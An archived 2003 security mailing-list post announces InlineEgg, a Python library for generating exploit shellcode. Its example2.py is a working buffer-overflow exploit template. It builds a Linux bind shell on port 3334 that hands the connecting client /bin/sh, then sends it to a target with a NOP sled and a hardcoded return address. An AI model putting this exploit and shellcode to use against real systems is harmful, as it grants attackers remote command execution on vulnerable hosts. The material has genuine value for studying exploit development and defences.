InlineEgg library release

From: Gerardo Richarte (gera@corest.com)
Date: Thu Sep 04 2003 - 18:35:55 EDT


We'd like to share with you the release of InlineEgg 1.0. the following
is a reduced version of the
README available at
http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html,
the same page points to the .tar.gz

Welcome to InlineEgg.

Short version:

    InlineEgg is a collection of python classes (a "library"), that will
help
you write small assembly programs, either to use as eggs/shellcode for your
exploits or for anything else you may need small assembly programs for. But!
without writing assembly, just using python.

    InlineEgg is now included in CORE IMPACT as another component of its egg
creation framework, but it started as a pretty simple idea to fulfill a
pretty
simple need. We hope that you find it helpful for your own creations, so we
are releasing it under an opensource license for non commercial uses.

Long version:

A simple need: When writing exploits for remote code execution
vulnerabilities
    (yes, that's what we do part of the time), you usually need to have
a small
    assembly program that will be sent to the vulnerable application as
part of
    the exploiting process. Historically, this small pieces of assembly code
    (eggs) were hardcoded as dead strings in the middle of the exploit. But,
    although having the strings handy gave the exploit writer some
reusability
    and some flexibility, we sometimes needed more, we even needed the
    possiblity of creating our small assembly programs in runtime, and make
    them addapt to the situation... well, there are lots of different
solutions
    to the problem, but as I already had some ideas on how to do it, I
jumped
    into python.

A simple idea: Do something that lets us create small assembly programs by
    concatenating system calls, giving us the possibility of changing the
    arguments to the system calls, and adding more code when needed...

    [...]

--- example2.py -----------------------------------------
#!/usr/bin/python

from inlineegg import *
import socket
import struct
import sys

def listenShellEgg(listen_addr, listen_port):

# egg = InlineEgg(FreeBSDx86Syscall)
# egg = InlineEgg(OpenBSDx86Syscall)
   egg = InlineEgg(Linuxx86Syscall)

   # bind to port and listen
   sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)
   sock = egg.save(sock) # save the socket in a
variable (in stack)
   egg.bind(sock, (listen_addr, listen_port)) # sock is now the
variable, and it's used from the stack
   egg.listen(sock,1)

   client = egg.accept(sock, 0, 0)
   client = egg.save(client)
   egg.close(sock)

   egg.dup2(client, 0)
   egg.dup2(client, 1)
   egg.dup2(client, 2)
   egg.execve('/bin/sh',('bash','-i'))

   print "Egg len: %d" % len(egg)
   return egg

def main():
   if len(sys.argv) < 3:
      raise Exception, "Usage: %s <target ip> <target port>"

   # connect to target
   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   sock.connect((sys.argv[1], int(sys.argv[2])))

   # create egg
   egg = listenShellEgg('0.0.0.0',3334)

   # exploit

   retAddr = struct.pack('<L',0xbffffc24L)
   toSend = "\x90"*(1024-len(egg))
   toSend += egg.getCode()
   toSend += retAddr*20

   sock.send(toSend)

main()
---------------------------------------------------------

    [...]

    InlineEgg:
http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html

    I hope you find it useful and enjoy it,
    gera

---------------------------------------------------------------------------
FREE Trial!
New for security consultants and in-house pros: FOUNDSTONE PROFESSIONAL
and PROFESSIONAL TL software. Fast, reliable vulnerability assessment
technology powered by the award-winning FoundScan engine. Try it free for 21 days at: http://www.securityfocus.com/sponsor/Foundstone_pen-test_030825
----------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:39 EDT